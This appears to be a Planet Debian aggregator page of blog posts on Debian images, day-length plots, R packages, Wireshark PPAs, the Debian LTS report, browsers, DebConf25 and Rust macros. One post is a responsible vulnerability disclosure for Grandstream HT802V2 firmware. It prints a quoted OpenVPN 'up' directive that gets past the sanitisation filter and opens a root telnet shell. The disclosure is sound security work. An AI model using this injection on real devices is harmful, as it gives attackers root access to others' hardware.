Fortunately the folder explains in very detail the differences between these images and what you also find there. You can ignore the SHA... files if you do not know what they are needed for. They are not important for you. These ISO files are small and contain only the core Debian installer code and a small set of programs. If you install a desktop environment, the other packages will be downloaded at the end of the installation.

The folders bt-dvd and iso-dvd only contain debian-12.9.0-amd64-DVD-1.iso or the appropriate torrent file. In bt-bd and iso-bd you will only find debian-edu-12.9.0-amd64-BD-1.iso. These large images contain much more Debian packages, so you will not need a network connection during the installation.

For the other CPU architectures (other than amd64) Debian provides less variants of images but still a lot. In total, we have 44 ISO files (or torrents) for the current release of the Debian installer for all architectures. When using jigdo you can choose between 268 images.

And these are only the installer images for the stable release, no older or newer version are counted here.

Take a breath before we're diving into.....

The live images

The live images in release/12.9.0-live/amd64/iso-hybrid/ are only available for the amd64 architecture but for newer Debian releases there will be images also for arm64.

We have 7 different live images containing one of the most common desktop environments and one with only a text interface (standard).

debian-live-12.9.0-amd64-xfce.iso
debian-live-12.9.0-amd64-mate.iso
debian-live-12.9.0-amd64-lxqt.iso
debian-live-12.9.0-amd64-gnome.iso
debian-live-12.9.0-amd64-lxde.iso
debian-live-12.9.0-amd64-standard.iso
debian-live-12.9.0-amd64-cinnamon.iso
debian-live-12.9.0-amd64-kde.iso

The folder name iso-hybrid is the technology that you can use those ISO files for burning them onto a CD/DVD/BD or writing the same ISO file to a USB stick. bt-hybrid will give you the torrent files for downloading the same images using a torrent client program.

More recent installer and live images (aka testing)

For newer version of the images we have currently these folders:

daily-builds
weekly-builds
weekly-live-builds
trixie_di_alpha1

I suggest using the weekly-builds because in this folder you find a similar structure and all variants of images as in the release directory. For e.g.

weekly-builds/amd64/iso-cd/debian-testing-amd64-netinst.iso

and similar for the live images

weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-kde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-debian-junior.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-standard.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxqt.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-mate.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-xfce.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-gnome.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-cinnamon.iso
weekly-live-builds/arm64/iso-hybrid/debian-live-testing-arm64-gnome.iso

Here you see a new variant call debian-junior, which is a Debian blend. BitTorrent files are not available for weekly builds.

The daily-builds folder structure is different and only provide the small network install (netinst) ISOs but several versions of the last days. Currently we have 55 ISO files available there.

If you like to use the newest installation image fetch this one:

https://cdimage.debian.org/cdimage/daily-builds/sid_d-i/arch-latest/amd64/iso-cd/debian-testing-amd64-netinst.iso

Debian stable with a backports kernel

Unfortunately Debian does not provide any installation media using the stable release but including a backports kernel for newer hardware. This is because our installer environment is a very complex mix of special tools (like anna) and special .udeb versions of packages.

But the FAIme web service of my FAI project can build a custom installation image using the backports kernel. Choose a desktop environment, a language and add some packages names if you like. Then select Debian 12 bookworm and then enable backports repository including newer kernel. After a short time you can download your own installation image.

Older releases

Usually you should not use older releases for a new installation. In our archive the folder https://cdimage.debian.org/cdimage/archive/ contains 6163 ISO files starting from Debian 3.0 (first release was in 2002) and including every point release.

The full DVD image for the oldstable release (Debian 11.11.0 including non-free firmware) is here

https://cdimage.debian.org/cdimage/unofficial/non-free/cd-including-firmware/archive/latest-oldstable/amd64/iso-dvd/firmware-11.11.0-amd64-DVD-1.iso

the smaller netinst image is

https://cdimage.debian.org/cdimage/archive/11.10.0/amd64/iso-cd/debian-11.10.0-amd64-netinst.iso

The oldest ISO I could find is from 1999 using kernel 2.0.36

I still didn't managed to boot it in KVM.

UPDATE I got a kernel panic because the VM had 4GB RAM. Reducing this to 500MB RAM (also 8MB works) started the installer of Debian 2.1 without any problems.

Anything else?

In this post, we still did not cover the ports folder (the non official supported (older) hardware architectures) which contains around 760 ISO files and the unofficial folder (1445 ISO files) which also provided the ISOs which included the non-free firmware blobs in the past.

Then, there are more than 34.000 cloud images. But hey, no ISO files are involved there. This may be part of a complete new posting.

19 February, 2025 02:01PM

Dima Kogan

When are the days getting longer the fastest?

We're way past the winter solstice, and approaching the equinox. The sun is noticeably staying up later and later every day, which raises an obvious question: when are the days getting longer the fastest? Intuitively I want to say it should happen at the equinox. But does it happen exactly at the equinox? I could read up on all the gory details of this, or I could just make some plots. I wrote this:

#!/usr/bin/python3

import sys
import datetime
import astral.sun

lat  = 34.
year = 2025

city = astral.LocationInfo(latitude=lat, longitude=0)

date0 = datetime.datetime(year, 1, 1)

print("# date sunrise sunset length_min")

for i in range(365):
    date = date0 + datetime.timedelta(days=i)

    s = astral.sun.sun(city.observer, date=date)

    date_sunrise = s['sunrise']
    date_sunset  = s['sunset']

    date_string    = date.strftime('%Y-%m-%d')
    sunrise_string = date_sunrise.strftime('%H:%M')
    sunset_string  = date_sunset.strftime ('%H:%M')

    print(f"{date_string} {sunrise_string} {sunset_string} {(date_sunset-date_sunrise).total_seconds()/60}")

This computes the sunrise and sunset time every day of 2025 at a latitude of 34degrees (i.e. Los Angeles), and writes out a log file (using the vnlog format).

Let's plot it:

< sunrise-sunset.vnl                   \
  vnl-filter -p date,l='length_min/60' \
| feedgnuplot                          \
  --set 'format x "%b %d"'             \
  --domain                             \
  --timefmt '%Y-%m-%d'                 \
  --lines                              \
  --ylabel 'Day length (hours)'        \
  --hardcopy day-length.svg

day-length.svg

Well that makes sense. When are the days the longest/shortest?

$ < sunrise-sunset.vnl vnl-sort -grk length_min | head -n2 | vnl-align

#  date    sunrise sunset     length_min   
2025-06-21 04:49   19:14  864.8543702000001


$ < sunrise-sunset.vnl vnl-sort -gk length_min | head -n2 | vnl-align

#  date    sunrise sunset     length_min   
2025-12-21 07:01   16:54  592.8354265166668

Those are the solstices, as expected. Now let's look at the time gained/lost each day:

$ < sunrise-sunset.vnl                                  \
  vnl-filter -p date,d='diff(length_min)'               \
| vnl-filter --has d                                    \
| feedgnuplot                                           \
  --set 'format x "%b %d"'                              \
  --domain                                              \
  --timefmt '%Y-%m-%d'                                  \
  --lines                                               \
  --ylabel 'Daytime gained from the previous day (min)' \
  --hardcopy gain.svg

gain.svg

Looks vaguely sinusoidal, like the last plot. And looks like we gain/lost as most ~2 minutes each day. When does the gain peak?

$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -grk d | head -n2 | vnl-align

#  date       d   
2025-03-19 2.13167


$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -gk d | head -n2 | vnl-align

#  date        d   
2025-09-25 -2.09886

Not at the equinoxes! The fastest gain is a few days before the equinox and the fastest loss a few days after.

19 February, 2025 02:47AM by Dima Kogan

February 18, 2025

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppDE 0.1.8 on CRAN: Maintenance

A maintenance release of our RcppDE package arrived at CRAN. RcppDE is a “port” of DEoptim, a package for derivative-free optimisation using differential evolution, from plain C to C++. By using RcppArmadillo the code became a lot shorter and more legible. Our other main contribution is to leverage some of the excellence we get for free from using Rcpp, in particular the ability to optimise user-supplied compiled objective functions which can make things a lot faster than repeatedly evaluating interpreted objective functions as DEoptim does (and which, in fairness, most other optimisers do too). The gains can be quite substantial.

This release is mostly maintenance. In the repo, we switched to turning C++11 as a compilation standard off fairly soon after the previous release two and a half years ago. But as CRAN is now more insistent, it drove this release (as it has a few reccent ones). We also made a small internal change to allow compilation under ARMA_64BIT_WORD for larger vectors (which we cannot easily default to as 32-bit integers are engrained in R). Other than that just the usual updates to badges and continuous integration.

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppDE page, or the repository.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

18 February, 2025 11:27PM

hackergotchi for Steinar H. Gunderson

Steinar H. Gunderson

MySQL hypergraph optimizer talk

Norvald Ryeng, my old manager, held a talk on the MySQL hypergraph optimizer (which was my main project before I left a couple of years ago) at a pre-FOSDEM event; it's pretty interesting if you want to know the basics of how an SQL join optimizer works.

The talk doesn't go very deep into the specifics of the hypergraph optimizer, but in a sense, that's the point; an optimizer isn't characterized by one unique trick that fixes everything, it's about having a solid foundation and then iterating on that a lot. Perhaps 80% of the talk could just as well have been about any other System R-derived optimizer, and that's really a feature in itself.

I remember that perhaps the most satisfying property during development was when things we hadn't even thought of integrated smoothly; say, when we added support for planning windowing functions and the planner just started pushing down the required sorts (i.e., interesting orders) almost by itself. (This is very unlike the old MySQL optimizer, where pretty much everything needed to think of everything else, or else risk stepping on each others' toes.)

Apart from that, I honestly don't know how far it is from being a reasonable default :-) I guess try it and see, if you're using MySQL?

18 February, 2025 10:14PM

hackergotchi for Bálint Réczey

Bálint Réczey

Wireshark on Ubuntu: Stay Ahead with the Latest Releases and Nightly Builds

Wireshark is an essential tool for network analysis, and staying up to date with the latest releases ensures access to new features, security updates, and bug fixes. While Ubuntu’s official repositories provide stable versions, they are often not the most recent.

Wearing both WiresharkCore Developer and Debian/Ubuntu package maintainer hats, I’m happy to help the Wireshark team in providing updated packages for all supported Ubuntu versions through dedicated PPAs. This post outlines how you can install the latest stable and nightly Wireshark builds on Ubuntu.

Latest Stable Releases

For users who want the most up-to-date stable Wireshark version, we maintain a PPA with backports of the latest releases:

🔗 Stable Wireshark PPA:
👉 https://launchpad.net/~wireshark-dev/+archive/ubuntu/stable

Installation Instructions

To install the latest stable Wireshark version, add the PPA and update your package list:

sudo add-apt-repository ppa:wireshark-dev/stable
sudo apt install wireshark

Nightly Builds (Development Versions)

For those who want to test new features before they are officially released, nightly builds are also available. These builds track the latest development code and you can watch them cooking on their Launchpad recipe page.

🔗 Nightly PPA:
👉 https://code.launchpad.net/~wireshark-dev/+archive/ubuntu/nightly

Installation Instructions

To install the latest development version of Wireshark, use the following commands:

sudo add-apt-repository ppa:wireshark-dev/nightly
sudo apt install wireshark

Note: Nightly builds may contain experimental features and are not guaranteed to be as stable as the official releases. Also it targets only Ubuntu 24.04 and later including the current development release.

If you need to revert to the stable version later, remove the nightly PPA and reinstall Wireshark:

sudo add-apt-repository --remove ppa:wireshark-dev/nightly
sudo apt install wireshark

Happy sniffing! 🙂

18 February, 2025 09:57AM by Réczey Bálint

February 14, 2025

hackergotchi for Freexian Collaborators

Freexian Collaborators

Monthly report about Debian Long Term Support, January 2025 (by Roberto C. Sánchez)

Like each month, have a look at the work funded by Freexian’s Debian LTS offering.

Debian LTS contributors

In January, 20 contributors have been paid to work on Debian LTS, their reports are available:

  • Abhijith PA did 8.0h (out of 14.0h assigned), thus carrying over 6.0h to the next month.
  • Adrian Bunk did 36.5h (out of 47.75h assigned and 52.25h from previous period), thus carrying over 63.5h to the next month.
  • Andrej Shadura did 11.0h (out of 11.0h assigned and 4.0h from previous period), thus carrying over 4.0h to the next month.
  • Arturo Borrero Gonzalez did 9.0h (out of 10.0h assigned), thus carrying over 1.0h to the next month.
  • Bastien Roucariès did 22.0h (out of 22.0h assigned).
  • Ben Hutchings did 8.0h (out of 21.0h assigned and 3.0h from previous period), thus carrying over 16.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 20.0h (out of 23.0h assigned and 3.0h from previous period), thus carrying over 6.0h to the next month.
  • Emilio Pozuelo Monfort did 34.0h (out of 7.0h assigned and 27.75h from previous period), thus carrying over 0.75h to the next month.
  • Guilhem Moulin did 3.25h (out of 20.0h assigned), thus carrying over 16.75h to the next month.
  • Jochen Sprickerhof did 23.0h (out of 15.0h assigned and 8.0h from previous period).
  • Lee Garrett did 15.75h (out of 8.5h assigned and 51.5h from previous period), thus carrying over 44.25h to the next month.
  • Lucas Kanashiro did 8.0h (out of 32.0h assigned and 32.0h from previous period), thus carrying over 56.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. Sánchez did 14.75h (out of 13.5h assigned and 10.5h from previous period), thus carrying over 9.25h to the next month.
  • Santiago Ruano Rincón did 21.75h (out of 18.75h assigned and 6.25h from previous period), thus carrying over 3.25h to the next month.
  • Sean Whitton did 8.5h (out of 8.5h assigned).
  • Sylvain Beucler did 10.5h (out of 0.0h assigned and 49.5h from previous period), thus carrying over 39.0h to the next month.
  • Thorsten Alteholz did 11.0h (out of 11.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).

Evolution of the situation

In January, we have released 33 DLAs.

There were numerous security and non-security updates to Debian 11 (codename “bullseye”) during January.

  • Notable security updates:
    • rsync, prepared by Thorsten Alteholz, fixed several CVEs (including information leak and path traversal vulnerabilities)
    • tomcat9, prepared by Markus Koschany, fixed several CVEs (including denial of service and information disclosure vulnerabilities)
    • ruby2.7, prepared by Bastien Roucariès, fixed several CVEs (including denial of service vulnerabilities)
    • tiff, prepared by Adrian Bunk, fixed several CVEs (including NULL ptr, buffer overflow, use-after-free, and segfault vulnerabilities)
  • Notable non-security updates:
    • linux-6.1, prepared by Ben Hutchings, has been packaged for bullseye (this was done specifically to provide a supported upgrade path for systems that currently use kernel packages from the “bullseye-backports” suite)
    • debian-security-support, prepared by Santiago Ruano Rincón, which formalized the EOL of intel-mediasdk and node-matrix-js-sdk

In addition to the security and non-security updates targeting “bullseye”, various LTS contributors have prepared uploads targeting Debian 12 (codename “bookworm”) with fixes for a variety of vulnerabilities. Abhijith PA prepared an upload of puma; Bastien Roucariès prepared an upload of node-postcss with fixes for data processing and denial of service vulnerabilities; Daniel Leidert prepared updates for setuptools, python-asyncssh, and python-tornado; Lee Garrett prepared an upload of ansible-core; and Guilhem Moulin prepared updates for python-urllib3, sqlparse, and opensc. Santiago Ruano Rincón also worked on tracking and filing some issues about packages that need an update in recent releases to avoid regressions on upgrade. This relates to CVEs that were fixed in buster or bullseye, but remain open in bookworm. These updates, along with Santiago’s work on identifying and tracking similar issues, underscore the LTS Team’s commitment to ensuring that the work we do as part of LTS also benefits the current Debian stable release.

LTS contributor Sean Whitton also prepared an upload of jinja2 and Santiago Ruano Rincón prepared an upload of openjpeg2 for Debian unstable (codename “sid”), as part of the LTS Team effort to assist with package uploads to unstable.

Thanks to our sponsors

Sponsors that joined recently are in bold.

14 February, 2025 12:00AM by Roberto C. Sánchez

February 13, 2025

hackergotchi for Jonathan Dowland

Jonathan Dowland

10 years at Red Hat

Red Hat Fedora company logo

I've just passed my 10th anniversary of starting at Red Hat! As a personal milestone, this is the longest I've stayed in a job: I managed 10 years at Newcastle University, although not in one continuous role.

I haven't exactly worked in one continuous role at Red Hat either, but it feels like what I do Today is a logical evolution from what I started doing, whereas in Newcastle I jumped around a bit.

I've seen some changes: in my time here, we changed the logo from Shadow Man; we transitioned to using Google Workspace for lots of stuff, instead of in-house IT; we got bought by IBM; we changed President and CEO, twice. And millions of smaller things.

I won't reach an 11th: my Organisation in Red Hat is moving to IBM. I think this is sad news for Red Hat: they're losing some great people. But I'm optimistic for the future of my Organisation.

13 February, 2025 11:25AM

Russell Coker

Browser Choice

Browser Choice and Security Support

Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn’t an option and Chromium still has some of the Google anti-features built in.

Firefox

So I tried to use Firefox for the things I do. One feature of Chrome based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to allow that but I prefer to have a minimal number of addons and not have any that are just to replace deliberately broken settings in the browser. Also those addons can’t set a file for the URL, so I could set a web server for it but it’s annoying to have to setup a web server to work around a browser limitation.

Another thing that annoyed me was YouTube videos open in new tabs not starting to play when I change to the tab. There’s a Firefox setting for allowing web sites to autoplay but there doesn’t seem to be a way to add sites to the list.

Firefox is getting vertical tabs which is a really nice feature for wide displays [3].

Firefox has a Mozilla service for syncing passwords etc. It is possible to run your own server for this, but the server is written in Rust which is difficult to package and run [4]. There are Docker images for it but I prefer to avoid Docker, generally I think that Docker is a sign of failure in software development. If you can’t develop software that can be deployed without Docker then you aren’t developing it well.

Chromium

The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it’s not included in Debian. Some of the changes like “replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk” are things that could be considered controversial. It definitely isn’t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser.

What Next?

The Falcon browser that is part of the KDE project looks good, but QtWebEngine doesn’t have security support in Debian. Would it be possible to provide security support for it?

Ungoogled Chromium is available in Flatpak, so I’ll test that out. But ideally it would be packaged for Debian. I’ll try building a package of it and see how that goes.

The Iridium Browser is another option [6], it seems similar in design to Ungoogled-Chromium but by different people.

13 February, 2025 11:04AM by etbe

hackergotchi for Bits from Debian

Bits from Debian

DebConf25 Logo Contest Results

Last November, the DebConf25 Team asked the community to help design the logo for the 25th Debian Developers' Conference and the results are in! The logo contest received 23 submissions and we thank all the 295 people who took the time to participate in the survey. There were several amazing proposals, so choosing was not easy.

We are pleased to announce that the winner of the logo survey is 'Tower with red Debian Swirl originating from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0.

[DebConf25 Logo Contest Winner]

Juliana also shared with us a bit of her motivation, creative process and inspiration when designing her logo:

The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!

Congratulations, Juliana, and thank you very much for your contribution to Debian!

The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC.

Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website.

See you in Brest!

13 February, 2025 09:00AM by Donald Norwood, Santiago Ruano Rincón, Jean–Pierre Giraud

February 12, 2025

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppUUID 1.2.0 on CRAN: Adding Clock-based UUIDs

The RcppUUID package on CRAN has been providing UUIDs (based on the underlying Boost library) for several years. Written by Artem Klemsov and maintained in this gitlab repo, the package is a very nice example of clean and straightforward library binding. As it had dropped off CRAN over a relatively minor issue, I descided to adopted it with the previous 1.1.2 release made quite recently.

This release adds new high-resolution clock-based UUIDs accordingt to the v7 spec. Internally 100ns increments are represented. The resulting UUIDs are both unique and sortable. I added this recent example to the README.md which illustrated both the implicit ordering and uniqueness. The unit tests check this with a much larger N.

> RcppUUID::uuid_generate_time(5)
[1] "0194d8fa-7add-735c-805b-6bbf22b78b9e" "0194d8fa-7add-735e-8012-3e0e53895b19"
[3] "0194d8fa-7add-735e-81af-bc67bb435ade" "0194d8fa-7add-735e-82b1-405bf57963ad"
[5] "0194d8fa-7add-735f-801e-efe57078b2e7"
>

While one can revert from the UUID object to the clock object, I am not aware of a text parser so there is currently no inverse function (as ulid offers) for the character representation.

The NEWS entry for the two releases follows.

Changes in version 1.2.0 (2025-02-12)

  • Time-based UUIDs, ie version 7, can now be generated (requiring Boost 1.86 or newer as in the current BH package)

Changes in version 1.1.2 (2025-01-31)

  • New maintainer to resurrect package on CRAN

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppUUID page, or the github repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

12 February, 2025 08:55PM

hackergotchi for Evgeni Golov

Evgeni Golov

Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.

Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did

echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}

After the fix it does

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}

That means it deletes all lines that either contain script-security or start with a set of options that allow command execution.

Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary.

Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened.

The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too.

That means that instead of

up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

from the original exploit by Tenable, we write

"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:

# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

And with that, once the OpenVPN connection is established, a reverse shell is spawned:

/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux

/ # id
uid=0(root) gid=0(root)

Affected devices

  • HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
  • Most probably also other HT8xxV2, as they use the same firmware
  • Most probably also HT8xx(V1), as their /etc/rc.d/init.d/openvpn looks very similar, according to firmware dumps

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
                         | sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}

So far I was unable to inject any further commands in this block.

Timeline

12 February, 2025 04:58PM by evgeni

hackergotchi for Jonathan Dowland

Jonathan Dowland

February 11, 2025

Ian Jackson

derive-deftly 1.0.0 - Rust derive macros, the easy way

derive-deftly 1.0 is released.

derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too!

Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules; and its convenience and simplicity, compared to proc macros.

Programmers coming to Rust from scripting languages will appreciate derive-deftly’s convenient automatic code generation, which works as a kind of compile-time introspection.

Rust’s two main macro systems

I’m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.

Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.

(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and, multiple module inclusion via #[path=]. These are beyond the scope of this blog post.)

macro_rules!

macro_rules! aka “pattern macros”, “declarative macros”, or sometimes “macros by example” are the simpler kind of Rust macro.

They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward:

macro_rules!’s pattern language doesn’t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there’s a horrible technique as a workaround.)

And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! { }. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.

Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.

macro_rules also has various other weird deficiencies too specific to list here.

Overall, compared to (say) the C preprocessor, it’s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.

proc macros

Rust’s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro’s implementation is Rust code, which takes the macro’s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.

This approach is more similar to Common Lisp’s macros than to most other programming languages’ macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.

This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum.

But, it is a complete pain in the backside to write and maintain a proc_macro.

The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust’s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.

There are build/execution environment problems. The proc_macro code can’t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can’t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.

derive-deftly to the rescue

derive-deftly lets you use a write a #[derive(...)] macro, driven by a data structure, without wading into any of that stuff.

Your macro definition is a template in a simple syntax, with predefined $-substitutions for the various parts of the input data structure.

Example

Here’s a real-world example from a personal project:

define_derive_deftly! {
    export UpdateWorkerReport:
    impl $ttype {
        pub fn update_worker_report(&self, wr: &mut WorkerReport) {
            $(
                ${when fmeta(worker_report)}
                wr.$fname = Some(self.$fname.clone()).into();
            )
        }
    }
}
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow {
    ...
    #[deftly(worker_report)]
    pub status: JobStatus,
    pub processing: NoneIsEmpty<ProcessingInfo>,
    #[deftly(worker_report)]
    pub info: String,
    pub duplicate_of: Option<JobId>,
}

This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:

    pub fn update_worker_report(&self, wr: &mut WorkerReport) {
        wr.status = Some(self.status.clone()).into();
        wr.info = Some(self.status.clone()).into();
    }

Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.

Special-purpose derive macros are now worthwhile!

Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros.

The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.

Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)

In my most recent personal Rust project, I have 22 bespoke derive macros, done with with derive-deftly, and 19 macro_rules macros.

derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.

Stability without stagnation

derive-deftly is already highly capable, and can solve many advanced problems.

It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide.

But declaring it 1.0 doesn’t mean that it won’t improve further.

Our ticket tracker has a laundry list of possible features. We’ll sometimes be cautious about committing to these, so we’ve added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.



comment count unavailable comments

11 February, 2025 09:16PM

hackergotchi for Bálint Réczey

Bálint Réczey

Supercharge Your Installs with apt-eatmydata: Because Who Needs Crash Safety Anyway? 😈

APT eatmydata super cow powers

Tired of waiting for apt to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day! 🎉

